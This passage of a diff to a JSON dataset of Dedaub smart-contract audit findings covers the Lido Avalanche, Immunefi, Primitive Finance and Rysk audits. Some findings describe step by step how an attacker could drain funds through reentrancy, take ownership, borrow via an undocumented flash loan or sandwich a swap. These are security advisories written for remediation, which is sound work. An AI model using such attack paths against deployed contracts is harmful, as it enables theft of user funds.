threshold needed for starting the request (of course in the case where the adversary group has a smaller threshold than the original one). // MpcManager.sol::joinRequest:238 uint256 threshold = _groupThreshold[info.groupId]; However, they dont have to join the request and can leave it pending. Since multiple public keys can be requested for the same group, they can proceed with dierent keys and dierent stake requests if they wish to interact with the contracts benevolently for their own benet. 0 The MpcManager.sol contract has quite a bit of o-chain logic, but we believe that it is valid as an adversary model to assume that groups can not be entirely trusted and that they can act adversely against other benevolent groups. In the opposite scenario, considering all groups as trusted could lead to centralization issues while only the MPC manager can create the groups.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "error messages Resolved In contract Timelock.sol the functions which are admin- or gov-only refer only to admin when it comes to authorization-related error messages. For example, in function queueTransaction() require(msg.sender == admin || msg.sender == gov, \"Timelock::queueTransaction: Call must come from admin.\"); Similar for functions cancelTransaction(), executeTransaction(). We suggest that the error messages are extended to include gov as well.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "can be called by a member of RESOLVED any group with any generated public key MpcManager::reportUTXO() does not contain any checks to ensure that the member which calls it is a member of the group that reported and conrmed the provided genPubKey. This means that a member of any group can call this function with any of the generated public keys even if the laer has been conrmed by and assigned to another group. By doing so, a group can run reportUTXO() changing the threshold needed for the report to be exported. It is not clear from the specication if allowing any member to call this function with any public key is the desired behaviour or if further checks should be applied.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "code reuse Info In contract vArmor.sol the Checkpoint struct is used to record both account votes (storage variable checkpoints) and the total token supply (storage variable checkpointsTotal) while the struct eld is named votes, making the code slightly harder to follow. For example, in function _writeCheckpointTotal we inspect the following checkpointsTotal[nCheckpoints - 1].votes = newTotal; A7 Floating pragma Info Use of a oating pragma: The oating pragma pragma solidity ^0.6.6; is used in the Timelock contract allowing it to be compiled with any version of the Solidity compiler that is greater or equal to v0.6.6 and lower than v.0.7.0. Although the differences between these versions are small, oating pragmas should be avoided and the pragma should be xed to the version that will be used for the contracts deployment. ArmorGovernance contract uses pragma solidity ^0.6.12; which can be altered to the identical and simpler pragma solidity 0.6.12;.", + "title": "number of remaining TODO items suggest certain functionality is not implemented RESOLVED There are a number of TODO items that spread across the entire codebase and test suite. Most of these TODOs are trivial and the test suite appears to be well developed. However, there is a small number of TODOs that concern checks and invariants and also unimplemented functionality like supporting more types of validator requests. This could mean that further development is needed, which could render the current security assessment partially insuicient. 010 LOW SEVERITY: ID Descriptio ", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "adversary can alter the amount in Distributor.deposit Resolved (but since entire VestingNFTReceiver is removed, similar threats need to be considered in the context of the new architecture upon future audits) Distributor::deposit computes the withdrawAmount by comparing the balance before and after the transfer: uint256 initialBalance = _thisBalance(token); if (token == NATIVE_ASSET) { payable(receiver).sendValue(amount); } else { token.safeTransfer(receiver, amount); } uint256 finalBalance = _thisBalance(token); require(initialBalance > finalBalance, \"Distributor: did not withdraw\"); uint256 withdrawAmount = initialBalance - finalBalance; An adversary who controls the deposit of funds to the distributor can start withdrawing, and deposit funds back to the distributor from within his receive hook. This will cause the distributor to register a possibly much smaller withdrawAmount than the amount actually withdrawn. When used in combination with vestingNFTReceiver, an attack can be executed as follows: First, the adversary withdraws an amount from vesting into the distributor, by calling VestingNFTReceiver::withdraw via Distributor::call Then the adversary starts withdrawing the same amount from the distributor (even if the amount is larger than his own share) From within his receive hook, the adversary releases an equal amount (minus 1 wei) from vesting to the distributor (again by calling VestingNFTReceiver::withdraw via Distributor::call) As a result, the distributor registered a withdrawal of just 1 wei, and the adversary can withdraw again. Using the above procedure, an adversary with only 1% share can withdraw all funds from the distributor in a single transaction. An exploit of this vulnerability has been implemented and will be provided together with this report. 5 This vulnerability can be prevented by a cross-contract lock that prevents entering VestingNFTReceiver::withdraw while Distributor::withdraw is active. A lighter (but less robust) solution is to add the following check: require(withdrawAmount >= amount) One should also keep in mind a symmetric but harder to exploit vulnerability: if the victim calls Distributor::withdraw, and in his receive hook triggers some untrusted code (e.g., transfers the received funds), the adversary can do a nested Distributor::withdraw, causing the distributor to register a larger withdrawn amount for the victim that the real one (hence increasing the adversary's share). A nonReentrant guard in Distributor::withdraw prevents this. The general recommendation at the end of C2 also applies here. C2 The adversary can transferOwnership on Resolved vestingNFTReceiver change Via Distributor::call, an adversary can call VestingNFTReceiver::transferOwnership and call VestingNFTReceiver::withdraw directly (not via the distributor) and receive all vesting funds. himself, which ownership him to allows then the to This can be solved by removing the transferOwnership method and baking the owner into the VestingNFTReceiver during initialization. As a general recommendation, having a general-purpose Distributor contract which allows arbitrary interactions with VestingNFTReceiver via Distributor::call, makes it much harder to design a safe interface. We recommend using a distributor contract with exactly the needed functionality, possibly even merged with VestingNFTReceiver. This would easily solve C2, and would also make it easy to add a lock that solves C1. High Severity ", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "claim of AVAX might result in rounding errors RESOLVED According to a note in the AvaLido::claim function, the protocol allows partial claims of unstake requests so that users don't need to wait for the entire request to be lled to get some liquidity. This is one of the reasons the exchange rate stAVAX:AVAX is set in function requestWithdrawal instead of in claim. The partial claim logic is implemented mainly in the following line: uint256 amountOfStAVAXToBurn = Math.mulDiv(request.stAVAXLocked, amount, request.amountRequested); The amount of stAVAX that are traded back, request.stAVAXLocked, is multiplied by the amount of AVAX claimed, amount, and the result is divided by the whole AVAX amount corresponding to the request, request.amountRequested to give us the corresponding amount of stAVAX that should be burned. This computation might suer from rounding errors depending on the amount parameter, leading to a small amount of stAVAX not being burned. We believe that these amounts would be too small to really aect the exchange rate of stAVAX:AVAX, still it would make sense to verify this or get rid of the rounding error altogether.", "labels": [ "Dedaub", - "Immunefi", - "Severity: Critical" + "Lido Avalanche", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "logic error in SumVesting combinator schedule Status Dismissed (intended behavior, assumptions on vesting schedules will be clearly stated) In combinator schedule SumVesting.sol it is implicitly assumed that the result of the sub-controllers for both getVested() and getWeight() is linearly dependant on the input amount function getVested(CommonParameters calldata input) external pure override returns (uint256 result) { [...] for (uint256 i; i < subControllers.length; i++) { IVestingController subController = subControllers[i]; uint256 share = subShares[i]; // Dedaub: should be input.amount * share/totalShares // Dedaub: but the division happens in the end nextInput.amount = share * input.amount; totalShares += share; [...] result += subController.getVested(nextInput); } result /= totalShares; } Thus the whole input amount is passed to all sub-controllers only to divide the accumulated result amount to the totalShares at the very end. While this assumption holds in the case of simple schedules, such as CliffVesting and LinearVesting, it may not hold for more complex ones that may be added in the future. 9 Similarly, an inaccurate input amount getContext(), createInitialState() and triggerEvent(). is passed to the sub-controllers in functions", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "might fail due to uninitialized variable RESOLVED Function Treasury::claim could be called while the avaLidoAddress storage variable might not have been set via the setAvaLidoAddress, leading to the transaction reverting due to msg.sender not being equal to address(0). This outcome can of course be considered desirable, but at the same time, the needed call to setAvaLidoAddresss adds unnecessary complexity. Currently, the setAvaLidoAddress function works practically as an initializer, as it cannot set the 01 avaLidoAddress storage variable more than once. If that is the intent, avaLidoAddress could be set in the initialize function, which would reduce the chances of claim and successively of AvaLido::claimUnstakedPrincipals and AvaLido::claimRewards calls reverting. L3 AvaLido::deposit check considers deposited amount twice RESOLVED The function AvaLido::deposit implements the following check: if (protocolControlledAVAX() + amount > maxProtocolControlledAVAX) revert ProtocolStakedAmountTooLarge(); However, the check should be changed to: if (protocolControlledAVAX() > maxProtocolControlledAVAX) revert ProtocolStakedAmountTooLarge(); as the function protocolControlledAVAX() uses address(this).balance, meaning that amount, which is equal to the msg.value, has already been taken into account once and if added to the value returned by protocolControlledAVAX(), it would be counted twice. Nevertheless, we expect that both conditions would never be satised as maxProtocolControlledAVAX is by default set to type(uint256).max. Still, we would advise addressing the issue just in case maxProtocolControlledAVAX is changed in the future. 01 CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) The protocol denes several admin/manager roles that serve to give access to specic functions of certain contracts only to the appropriate entities. The following roles are dened and used: DEFAULT_ADMIN_ROLE ROLE_PAUSE_MANAGER ROLE_FEE_MANAGER ROLE_ORACLE_ADMIN ROLE_VALIDATOR_MANAGER ROLE_MPC_MANAGER ROLE_TREASURY_MANAGER ROLE_PROTOCOL_MANAGER For example, the entity that is assigned the ROLE_MPC_MANAGER is able to call functions MpcManager::createGroup and MpcManager::requestKeygen that are essential for the correct functioning of the MPC component. Multiple roles allow for the distribution of power so that if one entity gets hacked all other functions of the protocol remain unaected. Of course, this assumes that the protocol team distributes the dierent roles to separate entities thoughtfully and does not completely alleviate centralization issues. The contract MpcManager.sol appears to build on/depend on a lot of o-chain logic that could make it suer from centralization issues as well. A possible aack scenario is described in issue M3 above that raises the question of credibility for the MPC groups even though they can only be created by the MPC manager. 01 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", "labels": [ "Dedaub", - "Immunefi", - "Severity: Informational" + "Lido Avalanche", + "Severity: Low" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "testing that a transaction succeeded Resolved The following test is taken from test/commentary_tests.js : await expect(Notary.connect(Operator).submitCommentary(BYTES32_STRING)); await expect(Notary.connect(Operator).submitCommentary(BYTES32_ZERO)).to.be.reverted; It seems that the intention of the rst line is to test that submitCommentary succeeded without reverting. However this line does not really check anything, the test will pass even if submitCommentary reverts. The correct test would be: await expect(Notary.connect(Operator).submitCommentary(BYTES32_STRING)).not.to.be.rever ted; similar Many exist test/distributor_tests.js (and possibly elsewhere). commentary_tests.js, cases in contract_tests.js and In the following case, adding the .not.to.be.reverted revealed logic errors in the test: it(\"Validating the attestation on disclosed report `AFTER` ATTESTATION_DELAY\", async function () { await Notary.connect(Triager).attest(reportRoot, kk, commit) await expect(Notary.connect(Triager).disclose(reportRoot, key, salt, value, merkleProofval)) const increaseTime = ATTESTATION_DELAY * 60 * 60 // ATTESTION in `hour` format x 60 min x 60 sec await ethers.provider.send(\"evm_increaseTime\", [increaseTime]) // 1. increase block time await ethers.provider.send(\"evm_mine\") // 2. then mine the block ... Here, disclose is executed before the ATTESTATION_DELAY so it should fail, although the test makes it look like it should succeed. The reason why the test passes is that: 1. The await expect(...) line performs no checks 10 2. Moreover this line does not wait for the transaction to nish, so although disclose is launched before moving time forward, it is executed in the future block, after the time delay, and as a consequence it succeeds. So, if .not.to.be.reverted is added to the await expect(...) line, the test will fail, unless the line is moved after the time increase.", + "title": "array of public keys provided to MpcManager::createGroup needs to be sorted ", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": " RESOLVED The array of public keys provided to MpcManager::createGroup by the MPC manager needs to be sorted otherwise the groupId produced by the keccak256 of the array might be dierent for the same sets of public keys. As sorting is tricky to perform on-chain and has not been implemented in this instance, the contracts API or documentation should make it clear that the array provided needs to be already sorted.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "variables Resolved There are some variables in contracts Distributor.sol and TokenMinter.sol that are assigned during contract construction and could never change thereafter. In Distributor.sol: /// Only settable by the initializer. bool public override callEnabled; address public override nftHolder; uint256 public override maxBeneficiaries In TokenMinter.sol: /// This initialized by the deployer. The token is completely trusted. IImmunefiToken public override token; We suggest these variables be declared immutable for clarity and gas efciency.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "in AvaLido::llUnstakeRequests is always true RESOLVED The following check in AvaLido::fillUnstakeRequests is expected to be always true, since the isFilled check right before guarantees that the request is not lled. if (isFilled(unstakeRequests[i])) { // This shouldn't happen, but revert if it does for clearer testing revert(\"Invalid state - filled request in queue\"); } // Dedaub: the following is expected to be always true if (unstakeRequests[i].amountFilled < unstakeRequests[i].amountRequested) { ... } 01", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "receive hook Dismissed (hook needed by IVestingNFTFunder.vestingN FTCallback) The receive() hook in VestingNFT is not to be used intentionally, since ETH is received via mint(). It would be better to revert to avoid accidentally receiving ETH.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "responsible for seing/updating numeric protocol parameters could dene bounds on these values INFO Functions like AvaLido::setStakePeriod and AvaLido::setMinStakeAmount could set lower and/or upper bounds for the accepted values. Such a change might require more initial thought but could protect against accidental mistakes when seing these parameters.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "need to construct a Merkle Tree can be easily avoided Open A large amount of code (MerkleTree.sol / QuickSort.sol) is aimed at constructing (rather than verifying) a MT. However, this is only used by BugReportNotary.assignNullCommentary to construct a tree for a trivial empty commentary. This can be easily avoided by having a hard-coded constant value NULL_COMMENTARY that denotes an empty commentary. The call to discloseCommentary can be omitted in this case 11 (or discloseCommentary can simply check that the value is empty) and NULL_COMMENTARY can be immediately set as canonical.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "might revert with ClaimTooLarge error INFO The function AvaLido::claim checks that the amount requested, amount, is not greater than request.amountFilled - request.amountClaimed. The user experience could be improved if in such cases instead of reverting the claimed amount was set to request.amountFilled - request.amountClaimed, i.e., the maximum amount that can be claimed at the moment. Such a change would require the claim function to return the claimed amount.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "code Partially resolved (dead code still present in LinearVesting.sol) In vesting schedule CliffVesting.sol function _decodeParams() is supposed to return a uint256 value function _decodeParams(bytes calldata params) internal pure returns (uint256 cliffTime) { cliffTime = abi.decode(params, (uint256)); } However, this schedule requires an empty parameter list function checkParams(CommonParameters calldata input) external pure override { require(input.params.length == 0); } All three internal functions _decodeParams(), _decodeState() and decodeContext() are never called for CliffVesting, while the later two are also never called for LinearVesting schedules. We suggest that all unused functions be removed for clarity and gas savings. Alternatively, the current body of CliffVesting::_decodeParams should be removed.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "storage variables RESOLVED There are a few storage variables that are not used: ValidatorSelector::minimumRequiredStakeTimeRemaining AvaLido::mpcManagerAddress", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "function argument Resolved (argument is not redundant for code extensibility reasons) In KeeperRewards::keeperRewards the rst argument is redundant function keeperRewards(address, uint256 value) external pure override returns (uint256) { return value / 1000; } We suggest it be removed for clarity. Also, the constant 1000 in the same code is an arbitrary magic constant, best given a name to document intent.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "UnstakeRequest struct eld RESOLVED Field requestedAt of struct UnstakeRequest is not used.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "calling pattern Resolved 12 In BugReportNotary the MerkleProof::verify function is called with different syntax. Once as: merkleProof.verify(reportRoot, leafHash) and once as: MerkleProof.verify(merkleProof, commentaryRoot, leafHash) We recommend making uniform for consistency.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "can be made external RESOLVED OracleManager::getWhitelistedOracles can be dened as external instead of public, as it is not called from any code inside the OracleManager contract.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "in vestingNFT Info The README asks for possible ways to remove ReentrancyGuard from vestingNFT. We believe that these guards are critical and advise against trying to remove them (we see no safe way to do so, while keeping the dynamic way of computing the amount of transferred tokens). In particular, a reentrancy to mint from withdraw will directly lead to a severe loss of funds. Currently this is indirectly protected by the nonReentrant ag in _deposit and _beforeTokenTransferInner (we recommend clearly documenting the importance of these ags, to prevent them from getting accidentally removed).", - "labels": [ - "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "funds in a single contract (VestingNFT) Info The architecture stores all ERC-20 tokens (assets) in a single contract (VestingNFT), and accounting for how they are shared among many different NFTs/bounties. This is a decision that puts a signicant burden on asset accounting. It should be simpler/safer to have a treasury contract that indexes assets by NFT and keeps assets entirely separate. However, the current design seems to exist in order to support ERC-20 tokens that change in number, with time. This certainly necessitates a shares model instead of a separate accounts model. It may be good to document exactly the behavior of tokens that the designer of the contract expects, with specic token examples. There are certainly token models that will not be supported by the current design, and others that are. A more radical approach could also be to use a clone of VestingNFT for each bounty (similarly to how clones of vestingNTFReceiver are used), so that funds for each bounty are kept in a separate contract. Apart from facilitating the accounting (no need for a \"shares\" model), this design would likely mitigate the losses from a critical bug (the adversary could drain a single bounty but not all of them).", - "labels": [ - "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "code Resolved 13 The function QuickSort::sort admits some simplications/dead-code elimination. Some of these are only possible under the invariant left < right (which is true in the current uses of the function), others regardless. We highlight them in the four code comments below. function sort( bytes32[] memory arr, uint256 left, uint256 right // Dedaub: invariant: left < right ) internal pure { uint256 i = left; uint256 j = right; if (i == j) return; // Dedaub: dead code, under invariant bytes32 pivot = arr[left + (right - left) / 2]; while (i <= j) { // Dedaub: definitely true the first time, under invariant, // loop could be a do..while while (arr[i] < pivot) i++; while (pivot < arr[j]) j--; if (i <= j) { // Dedaub: always the case, no need to check (arr[i], arr[j]) = (arr[j], arr[i]); i++; j--; } } if (left < j) sort(arr, left, j); if (i < right) sort(arr, i, right); }", - "labels": [ - "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "cannot recover from renouncing Dismissed (intended behavior) In the ImplOwnable contract (currently unused) if the owner calls renounceOwnership, no new owner can be installed. It is unclear whether this is intentional and whether the contract will be used in the future.", - "labels": [ - "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "for contract size Info 14 For the bytecode size issues of VestingNFT, our suggestion would be to create a VestingNFT library contract (containing all functions that do not heavily involve storage slots, such as pure functions, some views that only affect 1-2 storage slots) and have calls in VestingNFT delegate to the library versions. Shorter-term solutions might exist (e.g., removing one of the super-contracts, such as DelegateGuard, in some way) but they will not save a large contract from bumping against size limits for long.", - "labels": [ - "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "pragma Open Use of a oating pragma: The oating pragma pragma solidity ^0.8.6; is used, allowing contracts to be compiled with any version of the Solidity compiler that is greater or equal to v0.8.6 and lower than v.0.9.0. Although the differences between these versions should be small, for deployment, oating pragmas should ideally be avoided and the pragma be xed. A15 Compiler known issues Info Solidity compiler v0.8.6, at the time of writing, has no known bugs. 15", - "labels": [ - "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": "margins mapping indexing in SwapManager::swap RESOLVED Method SwapManager::swap performs an internal balance deposit on the margins mapping when params.toMargin evaluates to true. The margins mapping is a double mapping, going from a PrimitiveEngine address to a user address to the users margin. Instead of indexing the rst mapping with params.engine and the second with msg.sender, indexing is implemented the other way around, leading to invalid PrimitiveHouse state. H2 Incorrect margin deposit value in SwapManager::swap RESOLVED There is a second issue with the margins mapping update operation in SwapManager::swap (the one discussed in issue H1). The deposited amount of tokens is deltaIn instead of deltaOut, which creates inconsistency between the states of PrimitiveEngine and PrimitiveHouse and in general is not consistent with the protocols logic. The following snippet addresses both this issue and issue H1: if (params.toMargin) { margins[params.engine][msg.sender].deposit( params.riskyForStable ? params.deltaOut : 0, params.riskyForStable ? 0 : params.deltaOut ); } 0 [After our report, the Primitive Finance team identied that the deltaOut amount was deposited in the wrong margin, i.e., deltaOut risky in stable margin and the other way around. Consequently, the above example has the ternary operator result expressions inverted in its nal form.] MEDIUM SEVERITY: [No medium severity issues] LOW SEVERITY: ", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: High" - ] - }, - { - "title": "Flash-Loan Functionality ", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": " DISMISSED PrimitiveEngine::swap can be actually used to get flash loans from the Primitive reserves. However, this functionality is not documented and may have been implemented by mistake. One can get flash loans by implementing a contract with the swapCallback function. When this gets called by the engine, the output ER", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Low" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": "have already been transferred to the engine contract, and all that is required for the rest of the transaction to succeed is to transfer the input tokens back.", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Critical" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": "Multicall Error Handling OPEN The Multicall error handling mechanism assumes a xed ABI for error messages. This would have worked in Solidity 0.7.x for the default Error(string) ABI. However, Solidity has custom ABIs for 0.8.x that can encode valid errors with a shorter returndata. The correct way to propagate errors is to re-raise them (e.g., by copying the returndata to the revert input data). 0", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Low" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": "Reserve Balance Mechanisms DISMISSED The balances of the two reserve tokens in the engine are sometimes tracked by incrementing/decrementing internal counters and sometimes by checking balanceOf(). This not only causes the system to read more storage locations, and thus consume more gas, but it also automatically disqualies tokens that have dynamic balances such as aTokens. Fixed Swap Fee Might Not Compensate Theta Decay For All L4 Asset Pairs SPEC CHANGED Options, manifesting themselves as asset pairs of dierent types will encode dierent proportions of intrinsic and extrinsic value. Although the swap fee is meant to compensate for theta decay, it seems strange that this cannot be set per curve or per token pair. We note however that other important parameters such as sigma are customizable. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Low" - ] - }, - { - "title": "always returns true ", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": " RESOLVED Transfers::safeTransfer return value is always true (as noted in a comment), thus can be removed as an optimization.", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": "zero liquidity check in PrimitiveEngine::remove RESOLVED PrimitiveEngine::remove does not revert in case of 0 provided liquidity, which leads to unnecessary computation and gas fee for the user. PrimitiveHouse::remove implements an early check for such a scenario.", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": "Bookkeeping and Transfers DISMISSED The architecture as it currently stands, and the relationship between PrimitiveHouse and PrimitiveEngine causes multiple token transfers to intermediate contracts, and multiple layers of bookkeeping, with some redundancy. This causes the application to consume more gas. DISMISSED: The specic architecture is highly desired by the protocol developers. Nevertheless, a few transfer operations have been optimized. A4 No engine-risky-stable sanity check in PrimitiveHouse RESOLVED create and allocate methods In PrimitiveHouse::create and PrimitiveHouse::allocate the user has to provide the PrimitiveEngine address and the addresses of the risky and stable tokens, while there is no early check that ensures the pair of risky and stable tokens provided corresponds to the engine address. This check is implemented in the respective callback functions, maintaining the security of the protocol. However, the 0 execution of the contract will only revert at such a late point (i.e., in the callback) even if a user provides a wrong engine, risky and stable tokens triplet by mistake, leading to unnecessary gas consumption, which could have been avoided with an early check. 0", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Informational" - ] - }, - { - "title": "is susceptible to front-running RESOLVED The OptionExchange contracts redeem() function calls _swapExactInputSingle() with minimum output set to 0, making it susceptible to a front-running/sandwich aack when collateral is being liquidated. It is recommended that a minimum representing an acceptable loss on the swap is used instead. // OptionExchange::redeem function redeem(address[] memory _series) external { _onlyManager(); uint256 adLength = _series.length; for (uint256 i; i < adLength; i++) { // ... Dedaub: Code omied for brevity. if (otokenCollateralAsset == collateralAsset) { // ... Dedaub: Code omied for brevity. } else { // Dedaub: Minimum output set to 0. Susceptible to sandwich aacks. uint256 redeemableCollateral = _swapExactInputSingle(redeemAmount, 0, otokenCollateralAsset); SafeTransferLib.safeTransfer( ERC20(collateralAsset),address(liquidityPool),redeemableCollateral ); emit RedemptionSent( redeemableCollateral, collateralAsset, address(liquidityPool) ); } } } H2 VolatilityFeed updates are susceptible to front-running DISMISSED The VolatilityFeed contract uses the SABR model to compute the implied volatility of an option series. This model uses a number of parameters which are regularly updated by a keeper through the updateSabrParameters() function. It is possible for an aacker to front-run this update, transact with the LiquidityPool at the old price and then transact back with the LiquidityPool at the new price (computed in advance) if the dierence is protable. The Rysk team has indicated that trading will be paused for a few blocks to allow for parameter updates to happen and to eectively prevent this situation. MEDIUM SEVERITY: ID Description M1 No staleness check on the volatility feed ", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": " ACKNOWLEDGED The function quoteOptionPrice of the BeyondPricer contract retrieves the implied volatility from the function VolatilityFeed::getImpliedVolatility(). However, the returned value is not accompanied by a timestamp that can be used by the quoteOptionPrice() function to determine whether the value is stale or not. Since the implied volatility returned is aected by a keeper, which is responsible for updating the parameters of the underlying SABR model, it is recommended that staleness checks are implemented in order to avoid providing wrong implied volatility values. 5 LOW SEVERITY: ", - "labels": [ - "Dedaub", - "Rysk", - "Severity: High" - ] - }, - { - "title": "use of price feeds for the price of the underlyin ", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": " DISMISSED The BeyondPrice contract gets the price of the underlying token via the function _getUnderlyingPrice(), which consults a Chainlink price feed for the price. // BeyondPrice::_getUnderlyingPrice function _getUnderlyingPrice(address underlying, address _strikeAsset) internal view returns (uint256) { } return PriceFeed(protocol.priceFeed()). getNormalizedRate(underlying, _strikeAsset); However, when trying to obtain the same price in the function _getCollateralRequirements(), the addressBook is used to get the price feed from an Oracle implementing the IOracle interface. // BeyondPrice::_getCollateralRequirements function getCollateralRequirements( Types.OptionSeries memory _optionSeries, uint256 _amount ) internal view returns (uint256) { IMarginCalculator marginCalc = IMarginCalculator(addressBook.getMarginCalculator()); return marginCalc.getNakedMarginRequired( _optionSeries.underlying, _optionSeries.strikeAsset, _optionSeries.collateral, _amount / SCALE_FROM, _optionSeries.strike / SCALE_FROM, // assumes in e18 IOracle(addressBook.getOracle()).getPrice(_optionSeries.underlying), _optionSeries.expiration, 18, // always have the value return in e18 _optionSeries.isPut ); } The same addressBook technique is used in the getCollateral() function of the OptionRegistry contract and in the checkVaultHealth() function of the Option registry contract. It is recommended that this is refactored to use the Chainlink feed in order to avoid a situation where dierent prices for the underlying are obtained by dierent parts of the code. The Rysk team intends to keep the price close to what the Opyn system would quote, thus using the Opyn chainlink oracle is actually correct as it represents the actual situation that would occur for these given quotes L2 Multiple uses of div before mul in OptionExchanges _handleDHVBuyback() function RESOLVED In the OptionExchange contracts _handleDHVBuyback() function, a division is used before a multiplication operation at lines 925 and 932. It is recommended to use multiplication prior to division operations to avoid a possible loss of precision in the calculation. Alternatively, the mulDiv function of the PRBMath library could be used. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if 